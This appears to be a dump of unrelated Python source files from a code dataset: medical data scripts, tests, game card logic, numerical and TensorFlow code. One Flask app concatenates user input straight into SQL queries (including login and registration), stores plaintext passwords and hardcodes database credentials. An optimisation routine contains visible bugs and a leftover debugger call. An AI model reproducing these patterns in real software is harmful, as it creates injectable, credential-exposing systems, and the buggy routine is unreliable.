content
stringlengths 5
1.05M
|
|---|
#----------------------------------------------------------------------------------------------
'''
What to expect from this script:
1- This will generate list of patients with sepsis and no-sepsis in each sets.
2- More details be mentioned in the csv files "info_training_train/test"
'''
#----------------------------------------------------------------------------------------------
import os
from multiprocessing import Pool, cpu_count
import pandas as pd
import numpy as np
import sys
from sys import platform
from IPython.display import display, HTML
pd.set_option('display.max_columns', 500)
pd.set_option('display.max_rows', 500)
import time
from sklearn.preprocessing import normalize
from tqdm import tqdm
from sys import platform
def get_subjects(list_of_examples):
cols =['subject_id','Age', 'Gender', 'Unit1', 'Unit2', 'HospAdmTime', 'ICULOS', 'SepsisLabel'] #list(patient.columns[-7:])
subjects= pd.DataFrame([], columns=cols)
i=0
for file in list_of_examples: # tqdm(list_of_examples)
subject = pd.read_csv(file, sep = "|")
subject_details = list(subject[cols[1:]].max().values)
subject_details.insert(0,file.split('.')[0])
subjects.loc[i]=subject_details
i+=1
subjects.rename(columns={'ICULOS':'nb_samples'}, inplace=True)
return subjects
def generate_info():
for INP_DIR in [TRAIN_DIR, TEST_DIR]:
if "train" in INP_DIR:
prefix= "train"
else:
prefix = 'test'
os.chdir(INP_DIR)
list_of_files_train= os.listdir(INP_DIR)
n= round(len(list_of_files_train)/cpu_count())
print('n value is ...{}'.format(n))
files= [list_of_files_train[i:i + n] for i in range(0, len(list_of_files_train), n)]
with Pool(processes=cpu_count()) as pool:
res1 = pool.map(get_subjects, files)
subjects = pd.concat(res1)
del res1
# IDs of subjects wih Sepsis
Sepsis_subjects_id= subjects.loc[subjects.SepsisLabel.isin([1])].subject_id.values
# IDs of subjects wihout Sepsis
wihoutSepsis_subjects_id= subjects.loc[subjects.SepsisLabel.isin([0])].subject_id.values
# save files
output_directory = MAIN_DIR +prefix+'_info'
if not os.path.isdir(output_directory):
os.mkdir(output_directory)
save_file = os.path.join(output_directory, "info_training_"+prefix+".csv")
subjects.to_csv(save_file, index=False)
save_file = os.path.join(output_directory, "no_Sepsis_subject_id_"+prefix+".csv")
pd.DataFrame(wihoutSepsis_subjects_id,
columns=['subject_id']).to_csv(save_file, index=False)
save_file = os.path.join(output_directory, "yes_Sepsis_subject_id_"+prefix+".csv")
pd.DataFrame(Sepsis_subjects_id, columns=['subject_id']).to_csv(save_file, index=False)
print(prefix)
print("working in this diretory ..... " + INP_DIR)
print('generated the following files.....')
print(os.listdir(output_directory))
if __name__ == '__main__':
#----------------------------------------------------------------------------------------------
# how to run the code :
#---------------- Define MAIN_DIR where you have two files : training_setA and training_setB
MAIN_DIR = sys.argv[1]
#----------------------------------------------------------------------------------------------
TRAIN_DIR= MAIN_DIR +'train_data/'
TEST_DIR = MAIN_DIR +'test_data/'
train_files = os.listdir(TRAIN_DIR)
test_files = os.listdir(TEST_DIR)
# generate files
generate_info()
|
# -*- coding: UTF-8 -*-
#Exercício Python 34: Escreva um programa que pergunte o salário de um funcionário e calcule o valor do seu aumento. Para salários superiores a R$1250,00, calcule um aumento de 10%. Para os inferiores ou iguais, o aumento é de 15%.
from time import sleep
print("-=-=--=-=--=-=--=-=- |SISTEMA FINANCEIRO| -=-=--=-=--=-=--=-=-")
salario = float(input("Caro trabalhardor, informe o valor da sua remuneração: "))
print("PROCESSANDO...\n")
sleep(3)
if salario <= 1250:
salario = salario + (salario * 15 / 100)
print(f"Você recebeu um aumento de 15%\nSeu salário atualizado é: R$ {salario:.2f}\n")
else:
salario = salario + (salario * 10 / 100)
print(f"Você recebeu um aumento de 10%\nSeu salário atualizado é: R$ {salario:.2f}\n")
print("-=-=--=-=--=-=--=-=- |OPERAÇÃO FINALIZADA| -=-=--=-=--=-=--=-=-")
|
from guillotina.tests.utils import make_mocked_request
from guillotina_amqp.utils import make_request
from guillotina_amqp.utils import metric_measure
from guillotina_amqp.utils import serialize_request
import pytest
class MockPrometheusMetric:
def __init__(self, labels=None):
self.labels_called = False
self.observe_called = False
self._values = []
self._labels = {label: None for label in labels} if labels else {}
def labels(self, **labels):
self.labels_called = True
for label, value in labels.items():
if label not in self._labels:
raise Exception()
self._labels[label] = value
return self
def observe(self, value):
self.observe_called = True
self._values.append(value)
def test_metric_measure():
# Measure with None metric just returns
metric_measure(None, "foo", "bar")
# Measure fills labels and observe
histogram = MockPrometheusMetric(["label1", "label2"])
metric_measure(histogram, 20, {"label1": "foo", "label2": "bar"})
assert histogram.labels_called
assert histogram.observe_called
assert histogram._labels["label1"] == "foo"
assert histogram._labels["label2"] == "bar"
assert histogram._values == [20]
@pytest.mark.asyncio
async def test_serialize_request():
request = make_mocked_request(
"POST", "http://foobar.com", {"X-Header": "1"}, b"param1=yes,param2=no"
)
request.annotations = {"foo": "bar"}
serialized = serialize_request(request)
assert serialized["url"] == request.url
assert serialized["method"] == request.method
assert serialized["headers"] == dict(request.headers)
assert serialized["annotations"] == request.annotations
@pytest.mark.asyncio
async def test_make_request():
serialized = {
"annotations": {"_corr_id": "foo"},
"headers": {"Host": "localhost", "X-Header": "1"},
"method": "POST",
"url": "http://localhost/http://foobar.com?param1=yes,param2=no",
}
base_request = make_mocked_request("GET", "http://bar.ba", {"A": "2"}, b"caca=tua")
request = make_request(base_request, serialized)
assert serialized["url"] == request.url
assert serialized["method"] == request.method
assert serialized["headers"] == dict(request.headers)
assert serialized["annotations"] == request.annotations
|
'''
creates a user, item, rating, user_id, item_label csv file
cord-19 corpus
'''
import pandas as pd
import configargparse
from data import *
import sys
import json
from create_rec_sys_dataset import *
import numpy as np
import unidecode
import rdflib
from rdflib import URIRef
pd.set_option('display.max_columns', None)
pd.set_option("max_rows", None)
def id_to_index(df):
"""
maps the values to the lowest consecutive values
:param df: pandas Dataframe with columns user, item, rating
:return: pandas Dataframe with the columns index_item and index_user
"""
index_user = np.arange(0, len(df.user.unique()))
df_user_index = pd.DataFrame(df.user.unique(), columns=["user"])
df_user_index["new_index"] = index_user
df["index_user"] = df["user"].map(df_user_index.set_index('user')["new_index"]).fillna(0)
#print(df)
return df
def load_ontology(onto_path):
g = rdflib.Graph()
g.load(onto_path)
return g
def get_entities_labels(list_of_entities, chebi, hp, go, do ):
entities = []
count = 0
for id in list_of_entities:
uri = URIRef('http://purl.obolibrary.org/obo/' + id)
if id.startswith('CHEBI'):
lab = chebi.label(uri)
elif id.startswith('GO'):
lab = go.label(uri)
elif id.startswith('HP'):
lab = hp.label(uri)
elif id.startswith('DO'):
lab = do.label(uri)
entities.append(lab)
return entities
if __name__ == '__main__':
p = configargparse.ArgParser(default_config_files=['../config/config.ini'])
p.add('-mc', '--my-config', is_config_file=True, help='alternative config file path')
p.add("-oj", "--path_to_original_json_folder", required=False, help="path to original json", type=str)
p.add("-ej", "--path_to_entities_json_folder", required=False, help="path to entities json", type=str)
p.add("-pathcsv", "--path_to_csv", required=False, help="path to final csv", type=str)
p.add("-pathchebi", "--path_chebi", required=False, help="path to metadata", type=str)
p.add("-pathdo", "--path_do", required=False, help="path to metadata", type=str)
p.add("-pathgo", "--path_go", required=False, help="path to metadata", type=str)
p.add("-pathhp", "--path_hp", required=False, help="path to metadata", type=str)
options = p.parse_args()
original_json_folder = options.path_to_original_json_folder
entities_json_folder = options.path_to_entities_json_folder
path_to_final_csv = options.path_to_csv
path_chebi = options.path_chebi
path_do = options.path_do
path_go = options.path_go
path_hp = options.path_hp
entities_list_of_json_files = list_files_in_directory(entities_json_folder)
user_item_rating_all = []
count = 0
for file in entities_list_of_json_files:
print(count, "-", len(entities_list_of_json_files))
j_file_entities = open_json_file_pd(entities_json_folder, file)
df_entities = get_entities_id(get_entities(j_file_entities))
article_id = get_article_id(j_file_entities)
j_file_original = open_json_file(original_json_folder, article_id)
list_of_authors = get_authors_names(j_file_original)
user_item_rating = get_user_item_rating(list_of_authors, df_entities)
user_item_rating_all.append(user_item_rating)
count+=1
flat_list = []
for sublist in user_item_rating_all:
for item in sublist:
flat_list.append(item)
array = np.array(flat_list)
final_data = pd.DataFrame(array, columns=['user', 'item', 'rating'])
sum_df = final_data.groupby(['user', 'item']).size().reset_index().rename(columns={0: 'rating'})
df_with_user_id = id_to_index(sum_df)
### get entities labels
list_of_entities = df_with_user_id.item.unique()
print(list_of_entities)
###load ontos
chebi = load_ontology(path_chebi)
print("chebi")
do = load_ontology(path_do)
print('do')
go = load_ontology(path_go)
print('go')
hp = load_ontology(path_hp)
print('hp')
df_user_id = df_with_user_id[['index_user', 'item', 'rating']]
df_user_name = df_with_user_id[['index_user', 'item', 'rating']]
entities_label = get_entities_labels(list_of_entities, chebi, hp, go, do)
print(entities_label)
df_entities = pd.DataFrame(list_of_entities, columns=["item_id"])
df_entities["entity_name"] = np.array(entities_label)
print('mapping labels')
df_with_user_id["item_name"] = df_with_user_id["item"].map(df_entities.set_index('item_id')["entity_name"]).fillna(0)
# print(df)
print('saving')
df_with_user_id.to_csv(path_to_final_csv, index=False, header=False)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Script taken from http://stackoverflow.com/a/17579949/4070143 by inspectorG4dget
# to remove lines above and below certain string match.
# Minor modifications to read and write from stdin/stdout respectively
# and to remove some extra newlines getting added
import sys
def remLines(delim, above, below):
buff = []
line = sys.stdin.readline()
while line:
if delim in line.strip():
buff = []
for _ in range(below):
sys.stdin.readline()
else:
if len(buff) == above:
print(buff[0].replace('\r', '').replace('\n', ''))
buff = buff[1:]
buff.append(line)
line = sys.stdin.readline()
print(''.join(buff).strip())
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Error: no search pattern specified")
else:
remLines(sys.argv[1], 2, 1)
|
from flask import Flask, jsonify, request
import pymysql
app = Flask(__name__)
class Database:
def __init__(self):
host = "csc648.cxyapjc8a04v.us-west-1.rds.amazonaws.com"
user = "admin"
password = "rdsmysql"
db = "proddb"
self.con = pymysql.connect(host=host, user=user, password=password, db=db, cursorclass=pymysql.cursors.
DictCursor, autocommit=True)
self.cur = self.con.cursor()
def list_categories(self):
self.cur.execute("SELECT product_category_name FROM product_categories LIMIT 50")
result = self.cur.fetchall()
return result
def list_members(self):
self.cur.execute("SELECT first_name FROM Team_Members LIMIT 50")
result = self.cur.fetchall()
return result
def list_category_entries(self, categoryname):
query = "SELECT * FROM " + str(categoryname) + "_products LIMIT 50"
self.cur.execute(query)
result = self.cur.fetchall()
return result
def list_all_category_entries(self, paramobjects):
product_categories = ["class_notes", "video", "music"]
product_fields = ["product_name", "product_file_size", "product_description", "product_author"]
result = []
for category in product_categories:
if "search_query" in paramobjects and len(paramobjects) == 1:
for field in product_fields:
query = "SELECT * FROM " + category + "_products WHERE " + field + " LIKE '%" + \
paramobjects[
"search_query"] + "%' LIMIT 50"
self.cur.execute(query)
result += self.cur.fetchall()
return result
elif len(paramobjects) == 0:
query = "SELECT * FROM " + category + "_products LIMIT 50"
self.cur.execute(query)
result += self.cur.fetchall()
for field in product_fields:
if field in paramobjects:
query = "SELECT * FROM " + category + "_products WHERE " + field + " LIKE '%" + \
paramobjects[
field] + "%' LIMIT 50"
self.cur.execute(query)
result += self.cur.fetchall()
return result
# this function will return any entry where any field matches the search_query url parameter or if a field is specified. FROM SPECIFIED CATEGORY
def list_search_query_entries(self, categoryname, paramsobject):
product_fields = ["product_name", "product_file_size", "product_description", "product_author"]
if "search_query" in paramsobject and len(paramsobject) == 1:
result = []
for field in product_fields:
query = "SELECT * FROM " + str(categoryname) + "_products WHERE " + field + " LIKE '%" + paramsobject[
"search_query"] + "%' LIMIT 50"
self.cur.execute(query)
result += self.cur.fetchall()
return result
for field in product_fields:
if field in paramsobject:
query = "SELECT * FROM " + str(categoryname) + "_products WHERE " + field + " LIKE '%" + paramsobject[
field] + "%' LIMIT 50"
self.cur.execute(query)
return self.cur.fetchall()
def check_is_unregistered(self, email):
query = "SELECT email FROM registered_users WHERE email ='" + email + "'"
return not bool(self.cur.execute(query))
def check_is_registered(self, email):
query = "SELECT email FROM registered_users WHERE email ='" + email + "'"
return bool(self.cur.execute(query))
def authenticate_login(self, content):
query = "SELECT email,first_name,last_name,id FROM registered_users WHERE email ='" + content[
'email'] + "' AND password ='" + content['password'] + "'"
if bool(self.cur.execute(query)):
return self.cur.fetchall()
def register_user(self, registration_info):
query = "INSERT INTO registered_users(id,email,password,first_name,last_name) VALUES (0,'" + registration_info[
'email'] + "','" + registration_info['password'] + "','" + registration_info['first_name'] + "','" + \
registration_info['last_name'] + "')"
print(query)
print(self.cur.execute(query))
# this function returns all requested data searched from given category
@app.route('/api/search/<category>')
def get_search(category):
db = Database()
paramsobject = request.args
fixed_case = str(category.lower())
if category == "all" or category == "All":
emps = db.list_all_category_entries(paramsobject)
return jsonify(emps)
# capitalize all first letters of a category
# fixed_case = fixed_case.capitalize()
print(fixed_case)
if len(paramsobject) == 0:
emps = db.list_category_entries(fixed_case)
else:
emps = db.list_search_query_entries(fixed_case, paramsobject)
return jsonify(emps)
# this function returns the list of categories
@app.route('/api/search')
def list_categories():
db = Database()
emps = db.list_categories()
return jsonify(emps)
@app.route('/api/register', methods=['POST'])
def registerNewUser():
db = Database()
content = request.get_json()
if db.check_is_unregistered(content['email']):
db.register_user(content)
#return content['email'] + " has been registered"
return content['email']
else:
return ""
#return content['email'] + " is already registered,check email and try again"
@app.route('/api/login', methods=['POST'])
def loginUser():
db = Database()
content = request.get_json()
if db.check_is_registered(content['email']):
return jsonify(db.authenticate_login(content))
# this is for the flask team to test new functionality easily by calling the /api/test endpoint
# this function will only test whatever code is inside test(). you are welcome to erase the definition to test your own
@app.route('/api/test')
def test():
db = Database()
paramsobject = request.args['search_query']
emps = db.list_all_category_entries(paramsobject)
return jsonify(emps)
# app run
app.run(debug=True)
|
import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
import src.pattern.PatternBuilder as PB
def test_build3():
colorsA = [0, 0, 0, 10, 10, 10, 1, 1, 1, 11, 11, 11, 2, 2, 2, 12, 12, 12, 3, 3, 3, 13, 13, 13, 4, 4, 4, 14, 14, 14, 5, 5, 5, 15, 15, 15, 6, 6, 6, 16, 16, 16, 7, 7, 7, 17, 17, 17, 8, 8, 8, 18, 18, 18, 9, 9, 9, 19, 19, 19]
colorsB = [20, 20, 20, 21, 21, 21, 30, 30, 30, 22, 22, 22, 23, 23, 23, 31, 31, 31, 24, 24, 24, 25, 25, 25, 32, 32, 32, 26, 26, 26, 27, 27, 27, 33, 33, 33, 28, 28, 28, 29, 29, 29, 34, 34, 34]
colorsC = [35, 35, 35, 36, 36, 36, 37, 37, 37, 38, 38, 38, 39, 39, 39]
expected = [i for eyes in [[n, n, n] for n in range(40)] for i in eyes]
result = PB.build3([colorsA, colorsB, colorsC])
assert(expected == result)
test_build3()
|
import copy
from hearthbreaker.constants import CHARACTER_CLASS, CARD_RARITY, MINION_TYPE
from hearthbreaker.game_objects import Card, Minion, MinionCard, SecretCard
import hearthbreaker.targeting
class ArcaneMissiles(Card):
def __init__(self):
super().__init__("Arcane Missiles", 1, CHARACTER_CLASS.MAGE, CARD_RARITY.FREE)
def use(self, player, game):
super().use(player, game)
for i in range(0, player.effective_spell_damage(3)):
targets = copy.copy(game.other_player.minions)
targets.append(game.other_player.hero)
target = game.random_choice(targets)
target.damage(1, self)
class IceLance(Card):
def __init__(self):
super().__init__("Ice Lance", 1, CHARACTER_CLASS.MAGE, CARD_RARITY.COMMON,
hearthbreaker.targeting.find_spell_target)
def use(self, player, game):
super().use(player, game)
if self.target.frozen:
self.target.damage(4, self)
else:
self.target.freeze()
class MirrorImage(Card):
def __init__(self):
super().__init__("Mirror Image", 1, CHARACTER_CLASS.MAGE, CARD_RARITY.COMMON)
def use(self, player, game):
super().use(player, game)
class MirrorImageMinion(MinionCard):
def __init__(self):
super().__init__("Mirror Image", 0, CHARACTER_CLASS.MAGE, CARD_RARITY.SPECIAL)
def create_minion(self, p):
minion = Minion(0, 2)
minion.taunt = True
return minion
for i in range(0, 2):
mirror_image = MirrorImageMinion()
mirror_image.summon(player, game, len(player.minions))
class ArcaneExplosion(Card):
def __init__(self):
super().__init__("Arcane Explosion", 2, CHARACTER_CLASS.MAGE, CARD_RARITY.FREE)
def use(self, player, game):
super().use(player, game)
for minion in copy.copy(game.other_player.minions):
minion.damage(player.effective_spell_damage(1), self)
class Frostbolt(Card):
def __init__(self):
super().__init__("Frostbolt", 2, CHARACTER_CLASS.MAGE, CARD_RARITY.COMMON,
hearthbreaker.targeting.find_spell_target)
def use(self, player, game):
super().use(player, game)
self.target.damage(player.effective_spell_damage(3), self)
self.target.freeze()
class ArcaneIntellect(Card):
def __init__(self):
super().__init__("Arcane Intellect", 3, CHARACTER_CLASS.MAGE, CARD_RARITY.FREE)
def use(self, player, game):
super().use(player, game)
for c in range(0, 2):
player.draw()
class FrostNova(Card):
def __init__(self):
super().__init__("Frost Nova", 3, CHARACTER_CLASS.MAGE,
CARD_RARITY.COMMON)
def use(self, player, game):
super().use(player, game)
for minion in game.other_player.minions:
minion.freeze()
class Counterspell(SecretCard):
def __init__(self):
super().__init__("Counterspell", 3, CHARACTER_CLASS.MAGE, CARD_RARITY.RARE)
def use(self, player, game):
super().use(player, game)
def _reveal(self, card):
card.cancel = True
super().reveal()
def activate(self, player):
player.game.current_player.bind("spell_cast", self._reveal)
def deactivate(self, player):
player.game.current_player.unbind("spell_cast", self._reveal)
class IceBarrier(SecretCard):
def __init__(self):
super().__init__("Ice Barrier", 3, CHARACTER_CLASS.MAGE,
CARD_RARITY.COMMON)
def _reveal(self, attacker):
attacker.player.game.other_player.hero.armor += 8
super().reveal()
def activate(self, player):
player.hero.bind("attacked", self._reveal)
def deactivate(self, player):
player.hero.unbind("attacked", self._reveal)
class MirrorEntity(SecretCard):
def __init__(self):
super().__init__("Mirror Entity", 3, CHARACTER_CLASS.MAGE, CARD_RARITY.COMMON)
self.player = None
def _reveal(self, minion):
mirror = minion.copy(self.player)
mirror.add_to_board(len(self.player.minions))
super().reveal()
def activate(self, player):
player.game.current_player.bind("minion_played", self._reveal)
self.player = player
def deactivate(self, player):
player.game.current_player.unbind("minion_played", self._reveal)
self.player = None
class Spellbender(SecretCard):
def __init__(self):
super().__init__("Spellbender", 3, CHARACTER_CLASS.MAGE,
CARD_RARITY.EPIC)
self.player = None
def _reveal(self, card):
if len(self.player.minions) < 7 and card.targetable:
class SpellbenderMinion(MinionCard):
def __init__(self):
super().__init__("Spellbender", 0, CHARACTER_CLASS.MAGE, CARD_RARITY.SPECIAL)
def create_minion(self, p):
return Minion(1, 3)
def choose_bender(targets):
target = old_target(targets)
if isinstance(target, Minion):
spell_bender = SpellbenderMinion()
# According to http://us.battle.net/hearthstone/en/forum/topic/10070927066, Spellbender
# will not activate if there are too many minions
spell_bender.summon(self.player, self.player.game, len(self.player.minions))
self.player.game.current_player.agent.choose_target = old_target
bender = self.player.minions[-1]
super(Spellbender, self).reveal()
return bender
else:
return target
old_target = self.player.game.current_player.agent.choose_target
self.player.game.current_player.agent.choose_target = choose_bender
def activate(self, player):
player.game.current_player.bind("spell_cast", self._reveal)
self.player = player
def deactivate(self, player):
player.game.current_player.unbind("spell_cast", self._reveal)
self.player = None
class Vaporize(SecretCard):
def __init__(self):
super().__init__("Vaporize", 3, CHARACTER_CLASS.MAGE, CARD_RARITY.RARE)
def _reveal(self, attacker):
if type(attacker) is Minion and not attacker.removed:
attacker.die(self)
attacker.game.check_delayed()
super().reveal()
def activate(self, player):
player.hero.bind("attacked", self._reveal)
def deactivate(self, player):
player.hero.unbind("attacked", self._reveal)
class IceBlock(SecretCard):
def __init__(self):
super().__init__("Ice Block", 3, CHARACTER_CLASS.MAGE, CARD_RARITY.EPIC)
self.player = None
def _reveal(self, amount, attacker):
hero = self.player.hero
if hero.health - amount <= 0:
hero.immune = True
hero.health += amount
# TODO Check if this spell will also prevent damage to armor.
super().reveal()
def activate(self, player):
player.hero.bind("hero_damaged", self._reveal)
self.player = player
def deactivate(self, player):
player.hero.unbind("hero_damaged", self._reveal)
self.player = None
class ConeOfCold(Card):
def __init__(self):
super().__init__("Cone of Cold", 4, CHARACTER_CLASS.MAGE, CARD_RARITY.COMMON,
hearthbreaker.targeting.find_minion_spell_target)
def use(self, player, game):
super().use(player, game)
self.target.freeze()
index = self.target.index
if self.target.index < len(self.target.player.minions) - 1:
minion = self.target.player.minions[index + 1]
minion.damage(player.effective_spell_damage(1), self)
minion.freeze()
self.target.damage(player.effective_spell_damage(1), self)
if self.target.index > 0:
minion = self.target.player.minions[index - 1]
minion.damage(player.effective_spell_damage(1), self)
minion.freeze()
class Fireball(Card):
def __init__(self):
super().__init__("Fireball", 4, CHARACTER_CLASS.MAGE, CARD_RARITY.FREE,
hearthbreaker.targeting.find_spell_target)
def use(self, player, game):
super().use(player, game)
self.target.damage(player.effective_spell_damage(6), self)
class Polymorph(Card):
def __init__(self):
super().__init__("Polymorph", 4, CHARACTER_CLASS.MAGE, CARD_RARITY.FREE,
hearthbreaker.targeting.find_minion_spell_target)
def use(self, player, game):
super().use(player, game)
class Sheep(MinionCard):
def __init__(self):
super().__init__("Sheep", 0, CHARACTER_CLASS.ALL, CARD_RARITY.SPECIAL, MINION_TYPE.BEAST)
def create_minion(self, p):
return Minion(1, 1)
sheep = Sheep()
minion = sheep.create_minion(None)
minion.card = sheep
self.target.replace(minion)
class Blizzard(Card):
def __init__(self):
super().__init__("Blizzard", 6, CHARACTER_CLASS.MAGE, CARD_RARITY.RARE)
def use(self, player, game):
super().use(player, game)
for minion in copy.copy(game.other_player.minions):
minion.damage(player.effective_spell_damage(2), self)
minion.freeze()
class Flamestrike(Card):
def __init__(self):
super().__init__("Flamestrike", 7, CHARACTER_CLASS.MAGE, CARD_RARITY.COMMON)
def use(self, player, game):
super().use(player, game)
for minion in copy.copy(game.other_player.minions):
minion.damage(player.effective_spell_damage(4), self)
class Pyroblast(Card):
def __init__(self):
super().__init__("Pyroblast", 10, CHARACTER_CLASS.MAGE, CARD_RARITY.EPIC,
hearthbreaker.targeting.find_spell_target)
def use(self, player, game):
super().use(player, game)
self.target.damage(player.effective_spell_damage(10), self)
class Duplicate(SecretCard):
def __init__(self):
super().__init__("Duplicate", 3, CHARACTER_CLASS.MAGE, CARD_RARITY.COMMON)
self.player = None
def activate(self, player):
player.bind("minion_died", self._reveal)
self.player = player
def deactivate(self, player):
player.unbind("minion_died", self._reveal)
self.player = None
def _reveal(self, minion, by):
for c in range(0, 2):
if len(self.player.hand) < 10:
self.player.hand.append(type(minion.card)())
super().reveal()
|
import numpy as np
import math
import pdb
from .defaults import eps
from .util import find, add_value
from .polint import polint
from .gls.gls import gls
def csearch(fun, data, x, f, u, v, hess=None):
n = len(x)
x = np.minimum(v, np.maximum(x, u))
nohess = False
if hess is None:
nohess = True
hess = np.ones((n, n))
nfcsearch = 0
smaxls = 6
small = 0.1
nloc = 1
xmin = x
fmi = f
xminnew = xmin
fminew = fmi
x1 = np.array([])
x2 = np.array([])
f1 = 0
f2 = 0
g = np.zeros((n, 1))
ind0 = np.array([])
for i in range(n):
p = np.zeros((n, 1))
p[i, 0] = 1
if xmin[i, 0]:
delta = math.pow(eps, 1/3) * abs(xmin[i])
else:
delta = math.pow(eps, 1/3)
linesearch = 1
if xmin[i, 0] <= u[i]:
f1 = fun(data, xmin+delta*p)
nfcsearch += 1
if f1 >= fmi:
f2 = fun(data, xmin+2*delta*p)
nfcsearch += 1
x1 = add_value(x1, i, xmin[i, 0] + delta)
x2 = add_value(x2, i, xmin[i, 0] + 2 * delta)
if f2 >= fmi:
xminnew[i, 0] = xmin[i, 0]
fminew = fmi
else:
xminnew[i, 0] = x2[i, 0]
fminew = f2
linesearch = 0
else:
alist = np.array([0, delta])
flist = np.array([fmi, f1])
elif xmin[i] >= v[i]:
f1 = fun(data, xmin-2*delta*p)
nfcsearch += 1
if f1 >= fmi:
x1 = add_value(x1, i, xmin[i] - delta)
x2 = add_value(x2, i, xmin[i] - 2 * delta)
nfcsearch += 1
if f2 >= fmi:
xminnew[i] = xmin[i]
fminew = fmi
else:
xminnew[i] = x2[i]
fminew = f2
linesearch = 0
else:
alist = np.array([0, -delta])
flist = np.array([fmi, f1])
else:
alist = 0
flist = fmi
if linesearch:
pdb.set_trace()
alist, flist, nfls = gls(fun, data, u, v,
xmin, p, alist, flist,
nloc, small, smaxls)
nfcsearch += nfls
fminew, j = min(flist)
if fminew == fmi:
j = find(alist, lambda x: x == 0)
ind = find(abs(alist-alist[j]), lambda x: x < delta)
ind1 = find(ind, lambda x: x == j)
ind[ind1] = []
alist[ind] = []
flist[ind] = []
fminew, j = min(flist)
xminnew[i] = xmin[i] + alist[j]
if i == 0 or not alist[j]:
if j == 1:
x1 = add_value(x1, i, xmin[i] + alist[1])
f1 = flist[1]
x2 = add_value(x2, i, xmin[i] + alist[2])
f2 = flist[2]
elif j == len(alist):
x1 = add_value(x1, i, xmin[i] + alist[j-1])
f1 = flist[j-1]
x2 = add_value(x2, i, xmin[i] + alist[j-2])
f2 = flist[j-2]
else:
x1 = add_value(x1, i, xmin[i] + alist[j-1])
f2 = flist[j-1]
x2 = add_value(x2, i, xmin[i] + alist[j+1])
f2 = flist[j+1]
xmin = add_value(xmin, i, xminnew[i])
fmi = fminew
else:
x1 = add_value(x1, i, xminnew[i])
f1 = fminew
if xmin[i] < x1[i] & j < len(alist):
x2 = add_value(x2, i, xmin[i] + alist[j+1])
f2 = flist[j+1]
elif j == 1:
if alist[j+1]:
x2 = add_value(x2, i, xmin[i] + alist[j+1])
f2 = flist[j+1]
else:
x2 = add_value(x2, i, xmin[i] + alist[j+2])
f2 = flist[j+2]
elif alist[j-1]:
x2 = add_value(x2, i, xmin[i] + alist[j-1])
f2 = flist[j-1]
else:
x2 = add_value(x2, i, xmin[i] + alist[j-2])
f2 = flist[j-2]
g_val, G_val = polint([xmin[i], x1[i], x2[i]],
[fmi, f1, f2])
g = add_value(g, i, g_val)
G = add_value(G, (i, i), G_val)
x = xmin
k1 = 0
if f1 <= f2:
x[i] = x1[i]
else:
x[i] = x2[i]
for k in range(i-1):
if hess[i, k]:
q1 = fmi + g[k] * (x1[k]-xmin[k])+0.5*G[k, k]*math.pow((x1[k] - xmin[k]), 2)
q2 = fmi + g[k] * (x2[k]-xmin[k])+0.5*G[k, k]*math.pow((x2[k] - xmin[k]), 2)
if q1 <= q2:
x[k] = x1[k]
else:
x[k] = x2[k]
f12 = fun(data, x)
nfcsearch += 1
G = add_value(
G, (i, k),
hessian(i, k, x, xmin, f12, fmi, g, G))
G = add_value(G, (k, i), G[i, k])
if f12 < fminew:
fminew = f12
xminnew = x
k1 = k
x = add_value(x, k, xmin[k])
else:
G = add_value(G, (i, k), 0)
G = add_value(G, (k, i), 0)
if fminew <= fmi:
if x1[i] == xminnew[i]:
x1[i] = xmin[i]
elif x2[i] == xminnew[i]:
x2[i] = xmin[i]
if k1 > 0:
if xminnew[k1] == x1[k1]:
x1[k1] = xmin[k1]
elif xminnew[k1] == x2[k1]:
x2[k1] = xmin[k1]
for k in range(i):
g = add_value(
g, i,
g[k] + G[i, k] * (xminnew[i] - xmin[i])
)
if nohess and k1 > 0:
g = add_value(
g, k,
g[k] + G[k1, k] * (xminnew[k1] - xmin[k1])
)
xmin = xminnew
fmi = fminew
return xmin, fmi, g, G, nfcsearch
|
from unittest import TestCase
from django.http import HttpRequest
from django.test import override_settings
from wagtail.wagtailcore.models import Site
from v1.middleware import StagingMiddleware
class StagingMiddlewareTestCase(TestCase):
@override_settings(STAGING_HOSTNAME='content.localhost')
def test_request_on_www(self):
request = self.request_for_hostname('localhost')
StagingMiddleware().process_request(request)
self.assertFalse(request.is_staging)
@override_settings(STAGING_HOSTNAME='content.localhost')
def test_request_on_content(self):
request = self.request_for_hostname('content.localhost')
StagingMiddleware().process_request(request)
self.assertTrue(request.is_staging)
def request_for_hostname(self, hostname):
request = HttpRequest()
request.META['SERVER_NAME'] = hostname
request.site = Site.objects.get(hostname=hostname)
return request
|
from .market import *
from .etx import *
from .bond import *
|
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
# noinspection PyUnresolvedReferences
from six.moves import range
import numpy as np
import tensorflow as tf
from ..framework import Layer
from ..utils import tf_int_shape
class SpatialGlimpse(Layer):
def __init__(self, size, depth, scale, trainable=True, data_format='NHWC', input_shape=None, input_dtype=None,
batch_size=None, name=None):
if isinstance(size, (list, tuple)):
self._height, self._width = size
else:
self._height = self._width = size
self._depth = depth
self._scale = scale
height = self._height
width = self._width
self._sizes = [np.array([height, width])]
for _ in range(1, self._depth):
height *= self._scale
width *= self._scale
self._sizes.append(np.array([height, width]))
if data_format not in {'NCHW', 'NHWC'}:
raise Exception('Invalid data format for SpatialGlimpse: {}'.format(data_format))
self._data_format = data_format
super(SpatialGlimpse, self).__init__(trainable, name, input_shape=[input_shape, (2,)],
input_dtype=input_dtype, batch_size=batch_size)
def _call(self, inputs):
super(SpatialGlimpse, self)._call(inputs)
if not isinstance(inputs, list):
raise Exception('SpatialGlimpse takes exactly two inputs')
offsets = inputs[1]
inputs = inputs[0]
output = []
for d in range(self._depth):
o = tf.image.extract_glimpse(inputs, tf.constant(self._sizes[d], dtype=tf.int32, shape=[2]), offsets)
if d > 0:
kernel_size = self._sizes[d] / self._sizes[0]
assert (np.any(kernel_size % 2) == 0.)
o = tf.nn.avg_pool(o,
ksize=[1, kernel_size[0], kernel_size[1], 1],
strides=[1, kernel_size[0], kernel_size[1], 1],
padding='VALID')
output.append(o)
input_shape = tf_int_shape(inputs)
batch_size = (-1,) if input_shape[0] is None else (input_shape[0],)
output_shape = batch_size + (self._height, self._width) + (self._depth,)
return tf.reshape(tf.pack(output, axis=4), shape=output_shape)
def _get_output_shape(self, input_shape):
"""Computes the output shape of the layer given an input shape.
This function assumes that the layer will be built to match the input shape.
Parameters
----------
